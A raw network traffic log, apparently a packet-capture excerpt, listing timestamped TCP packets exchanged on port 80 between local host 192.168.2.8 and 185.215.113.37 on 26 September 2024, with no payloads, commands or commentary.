Sep 26, 2024 06:00:13.053370953 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053380966 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053394079 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053397894 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053442955 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053450108 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053462982 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053477049 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053489923 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053494930 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053503036 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053519964 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053546906 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053554058 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053565979 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053584099 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053595066 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053596020 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053615093 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053617954 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053633928 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053647041 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053658009 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053658009 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053670883 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053683996 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053685904 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053710938 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053718090 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053725004 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053736925 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053750038 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053757906 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053761959 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053775072 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053776979 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053786039 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053797960 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053800106 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053826094 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053833008 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053842068 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053844929 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053858995 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053878069 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053883076 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053889990 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053904057 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053904057 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.053930998 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.053949118 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.054029942 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.054043055 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.054055929 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.054075003 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.054081917 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.054091930 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.054094076 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.054101944 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.054105997 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.054119110 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.054121971 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.054136038 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.054162979 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.097456932 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097482920 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097493887 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097521067 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.097553968 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.097642899 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097660065 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097672939 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097681046 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.097685099 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097704887 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097712040 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.097716093 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097732067 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097743988 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.097745895 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097757101 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097764015 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.097769976 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097788095 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097799063 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097800016 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.097809076 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097822905 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.097827911 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097841024 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097846031 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.097852945 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097865105 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097866058 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.097877026 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097888947 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097893000 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.097903967 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097917080 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097920895 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.097930908 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097940922 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097944021 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.097953081 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097964048 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.097971916 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.097976923 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.098001957 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.098022938 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.101246119 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.101295948 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.101314068 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.101325989 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.101346970 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.101362944 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.101363897 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.101397991 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.101399899 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.101408958 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.101430893 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.101445913 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.101454020 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.101465940 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.101476908 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.101486921 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.101491928 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.101504087 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.101521015 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.101541042 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.102143049 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.102154970 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.102190018 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.104562044 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.104588032 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.104598999 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.104610920 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.104610920 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.104636908 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.104660988 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.139626980 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.139720917 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.139820099 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.139833927 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.139847040 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.139858961 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.139867067 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.139883995 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.139895916 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.139899015 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.139914989 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.139923096 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.139926910 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.139946938 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.139950991 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.139957905 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.139971018 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.139981031 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.139982939 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.139996052 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.139996052 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140008926 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140027046 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140053034 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140081882 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140094995 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140105009 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140116930 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140125990 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140129089 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140149117 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140152931 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140161991 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140170097 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140173912 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140187979 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140197992 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140199900 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140213013 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140223026 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140223980 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140237093 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140239954 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140249014 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140259027 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140264988 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140270948 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140290976 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140295029 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140301943 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140315056 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140316010 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140327930 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140338898 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140338898 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140350103 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140366077 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140383959 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140384912 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140397072 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140408993 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140420914 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140427113 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140433073 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140444994 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140445948 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140470982 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140495062 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140508890 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140522003 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140532970 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140546083 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140548944 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140558004 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140573025 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140610933 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140624046 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140635967 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140636921 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140650034 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140654087 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140662909 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140672922 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140675068 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140686989 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140697956 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140726089 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140897989 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140908957 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140921116 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140932083 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140937090 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140944004 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140955925 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140961885 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140969992 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.140988111 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.140990973 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.141004086 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.141005039 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.141014099 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.141026020 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.141038895 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.141046047 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.141051054 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.141064882 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.141067028 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.141079903 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.141092062 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.141103983 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.141114950 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.141139030 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.184282064 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184309006 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184322119 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184372902 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.184379101 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184391975 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184397936 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.184403896 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184417963 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184439898 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184444904 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.184451103 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184463024 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184464931 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.184477091 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184501886 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.184526920 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.184535027 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184551001 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184573889 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.184581041 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184590101 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.184592962 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184604883 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184614897 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.184617043 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184631109 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184639931 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.184648991 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184663057 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184669018 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.184674025 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.184686899 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.184720039 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.187990904 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:13.188045979 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.480989933 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:13.784197092 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:14.300580025 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:14.301371098 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:15.019922018 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:15.020011902 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:15.151707888 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:15.156548023 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:15.867189884 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:15.867266893 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:16.567497969 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:16.572808981 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:17.341314077 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:17.341419935 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:17.900485039 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:18.044220924 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.247203112 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.247219086 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.247236967 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.247294903 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.247306108 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.247317076 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.247328043 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.247350931 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:18.247400999 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:18.247404099 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.247430086 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.247447968 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:18.247477055 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:18.247503042 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.247514963 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.247525930 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.247539043 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.247546911 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:18.247551918 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.247576952 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:18.247595072 CEST	49704	80	192.168.2.8	185.215.113.37
Sep 26, 2024 06:00:18.383785009 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.383837938 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.383848906 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.383876085 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.383889914 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.383899927 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.383910894 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.383929014 CEST	80	49704	185.215.113.37	192.168.2.8
Sep 26, 2024 06:00:18.383932114 CEST	49704	80	192.168.2.8	185.215.113.37
